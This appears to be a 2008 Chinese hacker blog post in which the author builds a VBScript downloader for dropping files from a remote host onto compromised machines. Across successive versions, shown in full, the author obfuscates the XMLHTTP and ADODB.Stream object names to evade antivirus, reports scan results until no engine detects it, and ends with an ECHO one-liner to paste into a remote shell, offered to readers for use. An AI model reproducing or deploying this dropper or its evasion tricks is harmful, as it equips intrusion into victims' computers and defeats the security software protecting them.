以前一直用网上下载的DOWN.VBS,可能是用的人太多的原因吧,好长时间没有玩了,这次拿出来用的时候,尽然被 瑞星给挂了,所以自己花了几分钟时间,写了一个,原代码如下:
Set xml = CreateObject("Microsoft.XMLHTTP"):xml.Open "GET",http://www.qhwins.com/tools/tools.rar,False:xml.Send:with CreateObject("ADODB.Stream") :.type=1:.open:.write xml.responseBody:.savetofile "c:\wins.exe",2:end with:set xml=Nothing 写完后在线进行多种病毒软件的扫描查杀,结果如下:
文件 d1.vbs 接收于 2008.11.07 15:40:55 (CET) 当前状态: 正在读取 ... 队列中 等待中 扫描中 完成 未发现 停止
结果: 11/35 (31.43%)
依然有11个杀毒软件会查杀,再来
上面的脚本运行后会从URL中下载文件,并保存到肉机的C:\WINS.EXE,用起来还要改名,使用不太顺手,再改进一下 写成函数,一次可下载多个文件的 function GetHttpFile(url) FileName=LCase(mid(url,InStrRev(url, "/")+1)) Set xml = CreateObject("Microsoft.XMLHTTP") xml.Open "GET",url,False xml.Send with CreateObject("ADODB.Stream") .type=1 .open .write xml.responseBody .savetofile ".\"&FileName,2 end with set xml=Nothing end function GetHttpFile("http://www.qhwins.com/tools/tools.rar") GetHttpFile("http://www.qhwins.com/images/logo.jpg")
嗯,文件成功下载,且文件名也被保持,不错! 呵呵,再在线扫描一下,TNND,还有6款杀软会杀,包括KBSJ,KBSJ这方面确实挺强悍的,瑞星早就查不出来了,呵呵 不怕,我再变,下面再给出一个免杀改进版 function GetHttpFile(url) dim m,s m="Microsoft.XMLHTTP" s="ADODB.Stream" FileName=LCase(mid(url,InStrRev(url, "/")+1)) Set xml = CreateObject(m) xml.Open "GET",url,False xml.Send with CreateObject(s) .type=1 .open .write xml.responseBody .savetofile ".\"&FileName,2 end with set xml=Nothing end function GetHttpFile("http://www.qhwins.com/tools/tools.rar") GetHttpFile("http://www.qhwins.com/images/logo.jpg")
还有两款杀软放不过,不过对付市面上的杀软,已经是游刃有余了,再次变形,
function GetHttpFile(url) dim m,s m="M_i_c_r_osoft.X_M_L_H_T_T_P" s="A_D_O_D_B_._S_t_r_e_a_m" FileName=LCase(mid(url,InStrRev(url, "/")+1)) Set xml = CreateObject(m) ....... end function GetHttpFile(http://www.qhwins.com/tools/tools.rar) GetHttpFile("http://www.qhwins.com/images/logo.jpg")
OK,在线扫描后发现逃过所有的杀毒软件,KBSJ也低头了,嘿嘿,爽,为了使用方便,我再给出一个ECHO版的,这样我们在CMDSHELL中直接粘,贴就可以使用了,方便 ECHO版的如下:
以下是引用片段: ECHO function GetHttpFile(url):dim m,s:m="M_i_c_r_osoft.X_M_L_H_T_T_P":s="A_D_O_D_B_._S_t_r_e_a_m":FileName=LCase(mid(url,InStrRev(url, "/")+1)):Set xml = CreateObject(replace(m,"_","")):xml.Open "GET",url,False:xml.Send:with CreateObject(replace(s,"_","")):.type=1:.open:.write xml.responseBody:.savetofile ".\"^&FileName,2:end with:set xml=Nothing:end function:GetHttpFile("http://www.qhwins.com/tools/tools.rar"):GetHttpFile("http://www.qhwins.com/images/logo.jpg")> DOWN.VBS |
注意ECHO版的直接用记事本打开,没有任何换行,BS了所有的杀毒软件,OK,拿去玩吧!上面的脚本中,多个下载之间用":"分开就行了,一起可以下载N多个文件。
另外,网上还找到一个使用更方面的,不过逃不过杀软件的查杀,我直接给免我免杀过的吧[在线搜索发现瑞星还会查杀,但是其它杀软都不会有反应了,瑞星的免杀起来也很简单,我就不花时间了,大家自己搞定吧!]
以下是引用片段: URL = LCase(WScript.Arguments(0)) dim m,s m="M^i^c^r^o^s^o^f^t^.^X^M^L^H^T^T^P" s="A=D=O=DB=.=S=t=r=e=a=m" set cmd =Createobject(replace(m,"^","")) cmd.Open "GET",URL,0 cmd.Send() FileName=LCase(mid(URL,InStrRev(URL, "/")+1)) Set CsCriptGet = Createobject(replace(s,"=","")) CsCriptGet.Mode = 3 CsCriptGet.Type = 1 CsCriptGet.Open() CsCriptGet.Write(cmd.responseBody) CsCriptGet.SaveToFile FileName,2 |
|